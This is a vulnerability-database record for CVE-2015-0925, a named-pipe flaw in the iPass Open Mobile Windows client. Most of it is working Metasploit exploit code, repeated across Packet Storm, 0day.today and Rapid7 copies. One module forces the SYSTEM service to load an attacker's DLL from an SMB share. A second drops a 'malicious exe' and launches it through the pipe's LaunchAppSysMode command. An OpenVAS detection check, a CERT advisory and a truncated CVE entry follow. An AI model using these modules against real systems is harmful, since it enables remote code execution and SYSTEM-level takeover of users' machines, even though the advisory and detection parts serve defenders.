ID PACKETSTORM:130813 Type packetstorm Reporter Matthias Kaiser Modified 2015-03-13T00:00:00
Description
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'IPass Control Pipe Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in the IPass Client service. This service provides a
named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
to force the service to load a DLL from a SMB share.
},
'Author' =>
[
'Matthias Kaiser', # Vulnerability discovery
'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-0925' ],
[ 'OSVDB', '117423' ],
[ 'BID', '72265' ],
[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x32', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 21 2015',
'DefaultTarget' => 0))
register_options(
[
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
], self.class)
deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
end
def check
echo_value = rand_text_alphanumeric(rand(10) + 10)
begin
response = send_command("System.Echo #{echo_value}")
if response =~ Regexp.new(echo_value)
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Unknown
end
rescue Rex::ConnectionError => e
vprint_error("Connection failed: #{e.class}: #{e}")
return Msf::Exploit::CheckCode::Unknown
rescue Rex::Proto::SMB::Exceptions::LoginError => e
vprint_error('Connection reset during login')
return Msf::Exploit::CheckCode::Unknown
end
end
def setup
super
self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
self.share = Rex::Text.rand_text_alpha(5)
end
def primer
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
end
def send_command(command)
# The connection is closed after each command, so we have to reopen it
connect
smb_login
pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
pipe.write(Rex::Text.to_unicode(command))
response = Rex::Text.to_ascii(pipe.read)
response
end
def exploit
begin
Timeout.timeout(datastore['SMB_DELAY']) { super }
rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end
end
end
`
{"id": "PACKETSTORM:130813", "type": "packetstorm", "bulletinFamily": "exploit", "title": "IPass Control Pipe Remote Command Execution", "description": "", "published": "2015-03-13T00:00:00", "modified": "2015-03-13T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.0}, "href": "https://packetstormsecurity.com/files/130813/IPass-Control-Pipe-Remote-Command-Execution.html", "reporter": "Matthias Kaiser", "references": [], "cvelist": ["CVE-2015-0925"], "lastseen": "2016-12-05T22:17:34", "viewCount": 11, "enchantments": {"score": {"value": 7.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:110652"]}, {"type": "cve", "idList": ["CVE-2015-0925"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/IPASS_LAUNCH_APP", "MSF:EXPLOIT/WINDOWS/SMB/IPASS_PIPE_EXEC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808732"]}, {"type": "zdt", "idList": ["1337DAY-ID-23385"]}], "rev": 4}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:110652"]}, {"type": "cve", "idList": ["CVE-2015-0925"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/IPASS_LAUNCH_APP"]}, {"type": "zdt", "idList": ["1337DAY-ID-23385"]}]}, "exploitation": null, "vulnersScore": 7.7}, "sourceHref": "https://packetstormsecurity.com/files/download/130813/ipass_pipe_exec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \ninclude Msf::Exploit::Remote::SMB::Server::Share \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'IPass Control Pipe Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the IPass Client service. This service provides a \nnamed pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused \nto force the service to load a DLL from a SMB share. \n}, \n'Author' => \n[ \n'Matthias Kaiser', # Vulnerability discovery \n'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-0925' ], \n[ 'OSVDB', '117423' ], \n[ 'BID', '72265' ], \n[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x32', { 'Arch' => ARCH_X86 } ], \n[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] \n], \n'Privileged' => true, \n'DisclosureDate' => 'Jan 21 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) \n], self.class) \n \nderegister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') \nend \n \ndef check \necho_value = rand_text_alphanumeric(rand(10) + 10) \n \nbegin \nresponse = send_command(\"System.Echo #{echo_value}\") \nif response =~ Regexp.new(echo_value) \nreturn Exploit::CheckCode::Vulnerable \nelse \nreturn Exploit::CheckCode::Unknown \nend \nrescue Rex::ConnectionError => e \nvprint_error(\"Connection failed: #{e.class}: #{e}\") \nreturn Msf::Exploit::CheckCode::Unknown \nrescue Rex::Proto::SMB::Exceptions::LoginError => e \nvprint_error('Connection reset during login') \nreturn Msf::Exploit::CheckCode::Unknown \nend \nend \n \ndef setup \nsuper \nself.file_name = \"#{Rex::Text.rand_text_alpha(7)}.dll\" \nself.share = Rex::Text.rand_text_alpha(5) \nend \n \ndef primer \nself.file_contents = generate_payload_dll \nprint_status(\"File available on #{unc}...\") \nsend_command(\"iPass.SWUpdateAssist.RegisterCOM #{unc}\") \nend \n \ndef send_command(command) \n# The connection is closed after each command, so we have to reopen it \nconnect \nsmb_login \npipe = simple.create_pipe('\\\\IPEFSYSPCPIPE') \npipe.write(Rex::Text.to_unicode(command)) \nresponse = Rex::Text.to_ascii(pipe.read) \n \nresponse \nend \n \n \ndef exploit \nbegin \nTimeout.timeout(datastore['SMB_DELAY']) { super } \nrescue Timeout::Error \n# do nothing... just finish exploit and stop smb server... \nend \nend \n \nend \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646625039}}
{"zdt": [{"lastseen": "2018-04-09T03:39:47", "description": "This Metasploit module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused to force the service to load a DLL from a SMB share.", "cvss3": {}, "published": "2015-03-13T00:00:00", "type": "zdt", "title": "iPass Control Pipe Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0925"], "modified": "2015-03-13T00:00:00", "id": "1337DAY-ID-23385", "href": "https://0day.today/exploit/description/23385", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n include Msf::Exploit::Remote::SMB::Server::Share\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'IPass Control Pipe Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the IPass Client service. This service provides a\r\n named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused\r\n to force the service to load a DLL from a SMB share.\r\n },\r\n 'Author' =>\r\n [\r\n 'Matthias Kaiser', # Vulnerability discovery\r\n 'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-0925' ],\r\n [ 'OSVDB', '117423' ],\r\n [ 'BID', '72265' ],\r\n [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x32', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Jan 21 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])\r\n ], self.class)\r\n\r\n deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')\r\n end\r\n\r\n def check\r\n echo_value = rand_text_alphanumeric(rand(10) + 10)\r\n\r\n begin\r\n response = send_command(\"System.Echo #{echo_value}\")\r\n if response =~ Regexp.new(echo_value)\r\n return Exploit::CheckCode::Vulnerable\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n rescue Rex::ConnectionError => e\r\n vprint_error(\"Connection failed: #{e.class}: #{e}\")\r\n return Msf::Exploit::CheckCode::Unknown\r\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\r\n vprint_error('Connection reset during login')\r\n return Msf::Exploit::CheckCode::Unknown\r\n end\r\n end\r\n\r\n def setup\r\n super\r\n self.file_name = \"#{Rex::Text.rand_text_alpha(7)}.dll\"\r\n self.share = Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def primer\r\n self.file_contents = generate_payload_dll\r\n print_status(\"File available on #{unc}...\")\r\n send_command(\"iPass.SWUpdateAssist.RegisterCOM #{unc}\")\r\n end\r\n\r\n def send_command(command)\r\n # The connection is closed after each command, so we have to reopen it\r\n connect\r\n smb_login\r\n pipe = simple.create_pipe('\\\\IPEFSYSPCPIPE')\r\n pipe.write(Rex::Text.to_unicode(command))\r\n response = Rex::Text.to_ascii(pipe.read)\r\n\r\n response\r\n end\r\n\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['SMB_DELAY']) { super }\r\n rescue Timeout::Error\r\n # do nothing... just finish exploit and stop smb server...\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/23385", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:35:09", "description": "This host is installed with iPass Open\n Mobile and is prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-08-03T00:00:00", "type": "openvas", "title": "iPass Open Mobile Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0925"], "modified": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310808732", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808732", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ipass_open_mobile_remote_code_exec_vuln_win.nasl 11811 2018-10-10 09:55:00Z asteins $\n#\n# iPass Open Mobile Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nCPE = \"cpe:/a:ipass:ipass_open_mobile\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808732\");\n script_version(\"$Revision: 11811 $\");\n script_cve_id(\"CVE-2015-0925\");\n script_bugtraq_id(72265);\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 11:55:00 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-03 16:39:37 +0530 (Wed, 03 Aug 2016)\");\n script_name(\"iPass Open Mobile Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with iPass Open\n Mobile and is prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a dll pathname in a\n crafted unicode string improperly handled by a subprocess reached through a\n named pipe.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n authenticated users to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"iPass Open Mobile prior to 2.4.5\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to iPass Open Mobile 2.4.5\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/110652\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ipass_open_mobile_detect_win.nasl\");\n script_mandatory_keys(\"IPass/OpenMobile/Win/Ver\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.ipass.com/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ipassVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ipassVer, test_version:\"2.4.5\"))\n{\n report = report_fixed_ver(installed_version:ipassVer, fixed_version:\"2.4.5\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:53:30", "description": "### Overview\n\nThe iPass Open Mobile Windows Client versions 2.4.4 and earlier contains a remote code execution vulnerability.\n\n### Description\n\n[**CWE-94**](<http://cwe.mitre.org/data/definitions/94.html>)**: Improper Control of Generation of Code ('Code Injection')**\n\nThe iPass Open Mobile Windows Client versions 2.4.4 and earlier utilizes named pipes for interprocess communication. One of the subprocesses spawned by the client runs with SYSTEM privileges. An authenticated user can register arbitrary DLL files, including ones located at UNC paths, by sending a specially-crafted unicode string to this subprocess to one of the named pipes. The `DllMain` function in the specified DLL file will then execute with SYSTEM privileges. \n \n--- \n \n### Impact\n\nA remote, authenticated user may be able to execute arbitrary code with SYSTEM privileges. \n \n--- \n \n### Solution\n\n**Apply an Update** \n \nAffected users should update to version 2.4.5. \n \n--- \n \n### Vendor Information\n\n110652\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### iPass Inc Affected\n\nUpdated: January 21, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 6.7 | E:POC/RL:OF/RC:C \nEnvironmental | 5.0 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.ipass.com/enterprise-mobility/>\n * <http://cwe.mitre.org/data/definitions/94.html>\n\n### Acknowledgements\n\nThanks to Matthias Kaiser for reporting this vulnerability.\n\nThis document was written by Todd Lewellen.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-0925](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-0925>) \n---|--- \n**Date Public:** | 2015-01-21 \n**Date First Published:** | 2015-01-21 \n**Date Last Updated: ** | 2015-01-21 16:26 UTC \n**Document Revision: ** | 24 \n", "cvss3": {}, "published": "2015-01-21T00:00:00", "type": "cert", "title": "iPass Open Mobile Windows Client contains a remote code execution vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": "2015-01-21T16:26:00", "id": "VU:110652", "href": "https://www.kb.cert.org/vuls/id/110652", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-07T22:49:27", "description": "This module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused to force the service to load a DLL from a SMB share.\n", "edition": 2, "cvss3": {}, "published": "2015-03-09T15:36:11", "type": "metasploit", "title": "IPass Control Pipe Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/SMB/IPASS_PIPE_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'IPass Control Pipe Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused\n to force the service to load a DLL from a SMB share.\n },\n 'Author' =>\n [\n 'Matthias Kaiser', # Vulnerability discovery\n 'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-0925' ],\n [ 'OSVDB', '117423' ],\n [ 'BID', '72265' ],\n [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows x32', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2015-01-21',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])\n ])\n\n deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')\n end\n\n def check\n echo_value = rand_text_alphanumeric(rand(10) + 10)\n\n begin\n response = send_command(\"System.Echo #{echo_value}\")\n if response =~ Regexp.new(echo_value)\n return Exploit::CheckCode::Vulnerable\n else\n return Exploit::CheckCode::Unknown\n end\n rescue Rex::ConnectionError => e\n vprint_error(\"Connection failed: #{e.class}: #{e}\")\n return Msf::Exploit::CheckCode::Unknown\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\n vprint_error(\"Error during login: #{e}\")\n return Msf::Exploit::CheckCode::Unknown\n rescue Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e\n vprint_error(e.to_s)\n return Msf::Exploit::CheckCode::Unknown\n end\n end\n\n def setup\n super\n self.file_name = \"#{Rex::Text.rand_text_alpha(7)}.dll\"\n self.share = Rex::Text.rand_text_alpha(5)\n end\n\n def primer\n self.file_contents = generate_payload_dll\n print_status(\"File available on #{unc}...\")\n send_command(\"iPass.SWUpdateAssist.RegisterCOM #{unc}\")\n end\n\n def send_command(command)\n # The connection is closed after each command, so we have to reopen it\n connect\n smb_login\n pipe = simple.create_pipe('\\\\IPEFSYSPCPIPE')\n pipe.write(Rex::Text.to_unicode(command))\n response = Rex::Text.to_ascii(pipe.read)\n\n response\n end\n\n\n def exploit\n begin\n Timeout.timeout(datastore['SMB_DELAY']) { super }\n rescue Timeout::Error\n # do nothing... just finish exploit and stop smb server...\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ipass_pipe_exec.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-07T22:51:52", "description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact with the iPass service. The service provides a LaunchAppSysMode command which allows to execute arbitrary commands as SYSTEM.\n", "edition": 2, "cvss3": {}, "published": "2015-03-13T21:53:17", "type": "metasploit", "title": "iPass Mobile Client Service Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/IPASS_LAUNCH_APP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Services\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'iPass Mobile Client Service Privilege Escalation',\n 'Description' => %q{\n The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. The service provides a LaunchAppSysMode command which\n allows to execute arbitrary commands as SYSTEM.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h0ng10' # Vulnerability discovery, metasploit module\n ],\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' =>\n [\n [ 'Windows', { } ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['CVE', '2015-0925'],\n ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt']\n ],\n 'DisclosureDate' => '2015-03-12',\n 'DefaultTarget' => 0\n }))\n\n register_options([\n OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)'])\n ])\n\n end\n\n def check\n os = sysinfo['OS']\n\n unless os =~ /windows/i\n return Exploit::CheckCode::Safe\n end\n\n svc = service_info('iPlatformService')\n if svc && svc[:display] =~ /iPlatformService/\n vprint_good(\"Found service '#{svc[:display]}'\")\n if is_running?\n vprint_good('Service is running')\n else\n vprint_error('Service is not running!')\n end\n\n vprint_good('Opening named pipe...')\n handle = open_named_pipe('\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE')\n\n if handle.nil?\n vprint_error('\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE named pipe not found')\n return Exploit::CheckCode::Safe\n else\n vprint_good('\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE found!')\n session.railgun.kernel32.CloseHandle(handle)\n end\n\n return Exploit::CheckCode::Vulnerable\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n\n def open_named_pipe(pipe)\n invalid_handle_value = 0xFFFFFFFF\n\n r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)\n handle = r['return']\n\n return nil if handle == invalid_handle_value\n\n handle\n end\n\n def write_named_pipe(handle, command)\n buffer = Rex::Text.to_unicode(command)\n w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil)\n\n if w['return'] == false\n print_error('The was an error writing to pipe, check permissions')\n return false\n end\n\n true\n end\n\n\n def is_running?\n begin\n status = service_status('iPlatformService')\n rescue RuntimeError => e\n print_error('Unable to retrieve service status')\n return false\n end\n\n return status && status[:state] == 4\n end\n\n def exploit\n if is_system?\n fail_with(Failure::NoTarget, 'Session is already elevated')\n end\n\n handle = open_named_pipe(\"\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE\")\n\n if handle.nil?\n fail_with(Failure::NoTarget, \"\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE named pipe not found\")\n else\n print_status(\"Opended \\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE! Proceeding...\")\n end\n\n if datastore['WritableDir'] and not datastore['WritableDir'].empty?\n temp_dir = datastore['WritableDir']\n else\n temp_dir = client.sys.config.getenv('TEMP')\n end\n\n print_status(\"Using #{temp_dir} to drop malicious exe\")\n\n begin\n cd(temp_dir)\n rescue Rex::Post::Meterpreter::RequestError\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::BadConfig, \"Failed to use the #{temp_dir} directory\")\n end\n\n print_status('Writing malicious exe to remote filesystem')\n write_path = pwd\n exe_name = \"#{rand_text_alpha(10 + rand(10))}.exe\"\n\n begin\n write_file(exe_name, generate_payload_exe)\n register_file_for_cleanup(\"#{write_path}\\\\#{exe_name}\")\n rescue Rex::Post::Meterpreter::RequestError\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, \"Failed to drop payload into #{temp_dir}\")\n end\n\n print_status('Sending LauchAppSysMode command')\n\n begin\n write_res = write_named_pipe(handle, \"iPass.EventsAction.LaunchAppSysMode #{write_path}\\\\#{exe_name};;;\")\n rescue Rex::Post::Meterpreter::RequestError\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, 'Failed to write to pipe')\n end\n\n unless write_res\n fail_with(Failure::Unknown, 'Failed to write to pipe')\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ipass_launch_app.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:47:50", "description": "The client in iPass Open Mobile before 2.4.5 on Windows allows remote authenticated users to execute arbitrary code via a DLL pathname in a crafted Unicode string that is improperly handled by a subprocess reached through a named pipe, as demonstrated by a UNC share pathname.", "cvss3": {}, "published": "2015-01-22T14:02:00", "type": "cve", "title": "CVE-2015-0925", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 